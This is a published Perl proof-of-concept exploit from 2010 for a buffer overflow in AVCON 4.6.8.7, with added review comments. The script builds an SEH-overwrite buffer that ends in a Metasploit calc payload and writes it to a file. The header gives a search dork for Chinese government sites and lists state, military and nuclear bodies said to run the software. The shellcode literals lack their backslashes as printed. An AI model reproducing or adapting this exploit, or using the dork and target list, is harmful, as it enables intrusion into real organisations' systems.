
avcon-overflow.txt

Posted on 07 May 2010

#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"
# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)
# 2 products from China and 2 0days in one month dizam!
# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration
#
# NOTE(review): proof-of-concept generator as published on this page. The
# script's only side effect is writing one file to the current directory; it
# does not contact the target itself. The string literals are reproduced
# exactly as they appear here (letter "x" followed by hex digits, no
# backslash), so as written the literals are ASCII text rather than raw
# bytes. The layout below (filler, nSEH, SEH, payload, padding) is the
# classic SEH-overwrite shape per the author's own labels; SafeSEH/SEHOP and
# DEP are the standard platform mitigations for this class of bug.

# Output file name. The header comment above says "exploit.txt" while the
# file actually written is "poc.txt" -- the header is stale.
my $exploit = "poc.txt";

# Filler repeated 1019 times; presumably the distance from the start of the
# input to the exception-handler record -- the offset cannot be verified
# from this file alone.
my $junk = "x41" x 1019;

# Next-SEH slot; the author labels it a 6-byte short jump over the handler
# address into the payload that follows.
my $nSEH = "xebx06x90x90"; # jmp 6 bytes

# Handler address, packed as a 32-bit little-endian value ('V'). The author
# labels it a pop/pop/ret gadget; the module it comes from is not named on
# this page.
my $SEH = pack('V',0x200504B4); # pop pop ret

# Payload as labelled by the author: a Metasploit windows/exec stub that
# runs calc (CMD=calc) with EXITFUNC=seh, passed through the
# x86/fnstenv_mov encoder. The literal holds 218 two-character hex groups,
# which matches the stated 218-byte size.
# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf = "x6ax31x59xd9xeexd9x74x24xf4x5bx81x73x13xc4" .
"xd2xe5x7bx83xebxfcxe2xf4x38x3ax6cx7bxc4xd2" .
"x85xf2x21xe3x37x1fx4fx80xd5xf0x96xdex6ex29" .
"xd0x59x97x53xcbx65xafx5dxf5x2dxd4xbbx68xee" .
"x84x07xc6xfexc5xbax0bxdfxe4xbcx26x22xb7x2c" .
"x4fx80xf5xf0x86xeexe4xabx4fx92x9dxfex04xa6" .
"xafx7ax14x82x6ex33xdcx59xbdx5bxc5x01x06x47" .
"x8dx59xd1xf0xc5x04xd4x84xf5x12x49xbax0bxdf" .
"xe4xbcxfcx32x90x8fxc7xafx1dx40xb9xf6x90x99" .
"x9cx59xbdx5fxc5x01x83xf0xc8x99x6ex23xd8xd3" .
"x36xf0xc0x59xe4xabx4dx96xc1x5fx9fx89x84x22" .
"x9ex83x1ax9bx9cx8dxbfxf0xd6x39x63x26xaexd3" .
"x68xfex7dxd2xe5x7bx94xbaxd4xf0xabx55x1axae" .
"x7fx2cxebx49x2exbax43xeex79x4fx1axaexf8xd4" .
"x99x71x44x29x05x0exc1x69xa2x68xb6xbdx8fx7b" .
"x97x2dx30x18xa5xbex86x7b";

# Trailing filler, 5000 repetitions of the "x90" literal.
my $padding = "x90" x 5000; # padding

# Final buffer: filler, then the two SEH-record slots, then payload and
# padding, in that order.
my $payload = $junk.$nSEH.$SEH.$buf.$padding;

# NOTE(review): two-arg open on a bareword filehandle with no error check;
# print and close are unchecked as well (perlcritic flags all three). The
# safe idiom is the three-arg form with a lexical handle and "or die",
# and checking close on a write handle. ">" truncates or creates poc.txt
# in the current working directory.
open (myfile,">$exploit");
print myfile $payload;
close (myfile);

 
